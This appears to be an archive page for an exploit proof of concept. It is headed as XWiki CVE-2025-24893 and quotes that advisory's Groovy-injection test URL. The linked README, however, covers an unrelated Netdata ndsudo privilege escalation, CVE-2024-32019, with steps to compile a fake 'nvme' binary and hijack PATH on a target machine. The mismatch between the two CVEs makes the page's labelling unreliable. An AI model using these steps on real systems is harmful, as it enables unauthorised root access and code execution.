Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-24893 PoC — Remote code execution as guest via SolrSearchMacros request in xwiki

Source
https://github.com/AliElKhatteb/CVE-2024-32019-POC
Associated Vulnerability
Title:Remote code execution as guest via SolrSearchMacros request in xwiki (CVE-2025-24893)
Description:XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any guest can perform arbitrary remote code execution through a request to `SolrSearch`. This impacts the confidentiality, integrity and availability of the whole XWiki installation. To reproduce on an instance, without being logged in, go to `<host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28"Hello%20from"%20%2B%20"%20search%20text%3A"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20`. If there is an output, and the title of the RSS feed contains `Hello from search text:42`, then the instance is vulnerable. This vulnerability has been patched in XWiki 15.10.11, 16.4.1 and 16.5.0RC1. Users are advised to upgrade. Users unable to upgrade may edit `Main.SolrSearchMacros` in `SolrSearchMacros.xml` on line 955 to match the `rawResponse` macro in `macros.vm#L2824` with a content type of `application/xml`, instead of simply outputting the content of the feed.
Description
this is a poc for the CVE-2025-24893
Readme

# ⚠️ CVE-2024-32019 - PoC

## 📌 Affected Versions

- `>= v1.45.0`, `< v1.45.3`  
- `>= v1.44.0-60`, `< v1.45.0-169`

---

## 🛠️ Proof of Concept

**CVE-2024-32019** — `ndsudo` local privilege escalation via **untrusted search path**.

### 🔧 Compile the Exploit

```bash
x86_64-linux-gnu-gcc -o nvme exploit.c -static
```

### 📤 Deploy on Target Machine

1. **Transfer the compiled binary** to the vulnerable machine.
2. Make it executable:

   ```bash
   chmod +x nvme
   ```

3. Exploit the vulnerable binary via `PATH` manipulation (use the same path where you uploaded your binary):

   ```bash
   PATH=$(pwd):$PATH /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
   ```

---

## 🔍 Reference

- [Netdata Security Advisory - GHSA-pmhq-4cxq-wj93](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93)

---

## ⚖️ Disclaimer and Terms

This Proof of Concept (PoC) code is provided for **educational and authorized penetration testing purposes only**.

- **No permission** is granted to modify, redistribute, or use this code for any other purposes.
- Unauthorized use or modification may be **illegal and unethical**.
- The authors take **no responsibility** for any misuse or damages.
File Snapshot

 [4.0K]  /data/pocs/5d75bd086b37147f80fd4161b39c948b116317f7
├── [ 239]  exploit.c
└── [1.2K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →